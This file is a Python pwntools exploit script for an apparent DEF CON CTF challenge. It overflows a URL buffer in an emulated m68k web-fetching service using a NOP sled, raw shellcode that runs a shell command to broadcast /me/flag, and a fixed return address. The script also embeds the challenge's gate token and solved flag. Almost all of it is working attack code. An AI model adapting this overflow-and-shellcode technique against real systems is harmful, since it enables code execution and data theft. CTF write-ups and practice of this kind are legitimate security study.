#!/usr/bin/env python2
# Just a super simple frontend for me to test the service (manually)
from pwn import *
#context.log_level = 'debug'
# pwntools packing helpers such as p32() take their word size and byte order
# from this global; m68k is a big-endian target, so packed words come out
# big-endian. Keep this set before anything in this file packs an address.
context.arch = 'm68k'
import base64
import io
import os
import re
import StringIO
import struct
import sys

import PIL.Image
# ImageChops is a separate submodule; import it explicitly instead of relying
# on it being loaded indirectly when a PNG is opened.
import PIL.ImageChops
# When True, main() pops each decoded "DEBUG" screenshot in an image viewer
# (PIL's Image.show()) as it arrives. Off by default; the final frame is still
# compared against success.png either way.
DEBUG = False
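def gen_exploit(host="example.com"):
    """Build the URL whose path overflows the target's request buffer.

    Per the author's notes the service turns the URL into a request line that
    starts with ``GET /aaa`` (8 bytes), so only the path -- not the scheme or
    host -- lands in the overflowed buffer (apparently 258 bytes). The path is
    laid out as:

        "/aaa" + NOP sled + shellcode   -> fills the 258-byte buffer
        "bcde"                          -> 4 bytes between buffer end and the
                                           saved return address (saved register
                                           or padding; verify against the binary)
        return address                  -> 4 bytes, big-endian

    Args:
        host: Host part of the URL. It does not change the overflow layout,
            only where the target tries to send its request; the author also
            used ``127.0.0.1``.

    Returns:
        The complete URL as a byte string (``str`` on Python 2), ready for
        ``sendline``.

    Raises:
        ValueError: if the shellcode leaves a negative or odd number of sled
            bytes. The sled is built from two-byte NOPs, so an odd gap would
            silently drop a byte and shift the return address off by one.

    The return address is a fixed stack location plus the author's empirical
    adjustments (+8, +96); this only works because the target runs with a
    deterministic stack layout (no ASLR).
    """
    # Bytes the service prepends before our data reaches the buffer.
    prefix_size = 8
    # Size of the overflowed buffer, prefix included.
    buffer_size = 258

    payload = ("http://%s/aaa" % host).encode("ascii")

    # Flag is in /me/flag.
    #
    # Earlier attempt (kept for reference): "open /me/flag". It ran, but the
    # popup landed behind the file viewer so nothing showed in the screenshot.
    #   "\xde\xfc\x03\xe8\x70\x02\x4e\x44\x4a\x80\x66\x3a\xb7\x83\x2f\x03\x2f\x3c\x6f\x70\x65\x6e\x2f\x3c\x62\x69\x6e\x2f\x2f\x3c\x75\x73\x72\x2f\x2f\x3c\x2f\x2f\x2f\x2f\x22\x0f\x2f\x03\x2f\x3c\x66\x6c\x61\x67\x2f\x3c\x2f\x6d\x65\x2f\x28\x0f\x2f\x03\x2f\x04\x2f\x01\x24\x0f\x70\x3b\x4e\x44\x60\xfe"
    #   "\xde\xfc\x03\xe8\xb7\x83\x2f\x03\x2f\x3c\x6f\x70\x65\x6e\x2f\x3c\x62\x69\x6e\x2f\x2f\x3c\x75\x73\x72\x2f\x2f\x3c\x2f\x2f\x2f\x2f\x22\x0f\x2f\x03\x2f\x3c\x66\x6c\x61\x67\x2f\x3c\x2f\x6d\x65\x2f\x28\x0f\x2f\x03\x2f\x04\x2f\x01\x24\x0f\x70\x3b\x4e\x44\x4e\x71\x4e\x71\x60\xfe"
    #
    # Current shellcode: per the author it runs
    #   /bin/sh -c "wall < /me/flag; wall < /me/flag"
    # so the flag is broadcast to the console, which the screenshot captures.
    # The ASCII visible in the bytes ("n/sh", "//bi", "-c", "wall", "</me",
    # "/fla", "g ;w", ...) is the command being pushed onto the stack in
    # 4-byte words; it ends in 0x4e44 (``trap #4``), presumably the system
    # call trap on this platform.
    shellcode = (
        b"\xde\xfc\x03\xe8\xb7\x83\x2f\x03\x2f\x3c\x6e\x2f\x73\x68\x2f\x3c\x2f\x2f\x62\x69\x22\x0f\x2f\x03\x3f\x3c\x2d\x63\x2a\x0f\x2f\x03"
        b"\x2f\x3c\x66\x6c\x61\x67\x2f\x3c\x2f\x6d\x65\x2f\x2f\x3c\x61\x6c\x6c\x3c\x2f\x3c\x67\x20\x3b\x77\x2f\x3c\x2f\x66\x6c\x61\x2f\x3c\x3c\x2f\x6d\x65\x2f\x3c\x77\x61\x6c\x6c"
        b"\x28\x0f\x2f\x03\x2f\x04\x2f\x05\x2f\x01\x24\x0f\x70\x3b\x4e\x44"
    )

    # Bytes of sled needed so that prefix + sled + shellcode exactly fills
    # the buffer. Fail loudly instead of silently truncating: the original
    # `/ 2` dropped a byte for odd gaps, which would misalign everything
    # after the sled.
    fill = buffer_size - prefix_size - len(shellcode)
    if fill < 0 or fill % 2:
        raise ValueError(
            "shellcode leaves %d sled bytes; need a non-negative even count" % fill
        )
    # 0x4e71 is the m68k NOP (two bytes), hence the halving.
    nopsled = b"\x4e\x71" * (fill // 2)
    payload += nopsled + shellcode

    # 4 bytes between the end of the buffer and the saved return address.
    payload += b"bcde"

    # Return address into the sled on the (deterministic) stack. Packed
    # big-endian explicitly -- the same thing pwntools' p32() did under
    # context.arch = 'm68k' -- so the layout no longer depends on the global
    # context being set first.
    ret_addr = struct.pack(">I", 0x3fff6f6 + 8 + 96)
    return payload + ret_addr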
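def _decode_frame(img_b64):
    """Decode the base64 PNG carried by one ``DEBUG`` line into a PIL image."""
    return PIL.Image.open(io.BytesIO(base64.b64decode(img_b64)))


def _looks_like_success(frame):
    """Compare the banner region of ``frame`` against the reference screenshot.

    ``success.png`` is loaded from the current working directory. The box from
    (47, 508) spanning 340x18 pixels is where the author observed the success
    banner; fewer than 100 differing pixels is treated as a match.
    """
    success_size = (340, 18)
    success_start = (47, 508)
    box = (
        success_start[0],
        success_start[1],
        success_start[0] + success_size[0],
        success_start[1] + success_size[1],
    )
    reference = PIL.Image.open('success.png')
    return pixel_diff(reference.crop(box), frame.crop(box)) < 100


def main():
    """Run one exploit attempt against the ``<ip>:<port>`` given on argv.

    Flow: answer the service's "Solution:" prompt with the canned token, send
    the overflowing URL from gen_exploit(), then stream the service's output
    until it hangs up. Lines starting with ``DEBUG`` carry a base64 PNG
    screenshot of the emulated machine; the last one received is compared
    against ``success.png`` to decide whether the payload landed.

    Note: the flag printed on success is a constant embedded in this script
    after the fact. The image check only confirms that the success banner
    appeared; nothing is read out of the screenshot.

    Exits with status -1 on bad usage. Connection errors and a hang-up before
    the "Booting up" marker propagate as pwntools exceptions, as before.
    """
    if len(sys.argv) != 2 or ":" not in sys.argv[1]:
        print("usage: exploit.py <ip>:<port>")
        sys.exit(-1)
    # Split on the last colon so the port is always the second part.
    ip, port = sys.argv[1].rsplit(":", 1)

    conn = remote(ip, port)
    last_frame = None
    try:
        # Canned answer to the service's gate prompt, as used during the CTF.
        print(conn.recvuntil("Solution:"))
        conn.sendline('OOOMAKESTHESAFESTBACKDOORS')
        print(conn.recvuntil("What URL would you like this old dog to fetch?"))
        payload = gen_exploit()
        print(repr(payload))
        conn.sendline(payload)
        print(conn.recvuntil("Booting up"))
        # Stream until EOF. "DEBUG <base64>" lines are screenshots (the six
        # skipped bytes are the "DEBUG " tag); everything else is echoed.
        try:
            while True:
                response = conn.recvline()
                if response.startswith("DEBUG"):
                    last_frame = _decode_frame(response[6:])
                    if DEBUG:
                        last_frame.show()
                else:
                    sys.stdout.write(response)
        except EOFError:
            pass
    finally:
        conn.close()

    print("In the last frame, extract that flag!")
    if last_frame is None:
        # The original indexed the frame variable here unconditionally and
        # died with UnboundLocalError if the service closed before sending
        # any DEBUG line.
        print("ERROR, no DEBUG frame received, nothing to compare")
    elif _looks_like_success(last_frame):
        print("GOT THE FLAG")
        # Known flag, hard-coded after the solve; not extracted from the image.
        print("FLAG: defconctf{Party_like_its_1992_for_the_next_Step}")
    else:
        print("ERROR, couldn't get the flag")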
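def pixel_diff(first, second):
    """Count the pixels that differ between two equally sized PIL images.

    The images are handed to ``PIL.ImageChops.difference`` (which also
    requires matching modes) and every pixel whose difference is non-zero in
    any band is counted once. main() treats a small count as "same screen".

    Args:
        first, second: PIL images of identical size (and mode).

    Returns:
        int: number of differing pixels.

    Raises:
        ValueError: if the two sizes differ. The original used ``assert``,
            which vanishes under ``python -O`` and would then surface as a
            less helpful error from ImageChops.
    """
    if first.size != second.size:
        raise ValueError(
            "image sizes differ: %r vs %r" % (first.size, second.size)
        )
    diff = PIL.ImageChops.difference(first, second)
    count = 0
    for px in diff.getdata():
        # Single-band images yield ints, multi-band images yield tuples. The
        # original compared against (0, 0, 0), which only works for 3-band
        # RGB: an RGBA or "L" image would have every pixel counted.
        if isinstance(px, tuple):
            if any(px):
                count += 1
        elif px != 0:
            count += 1
    return count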
# Script entry point: only run the exploit when executed directly.
if __name__ == '__main__':
    main()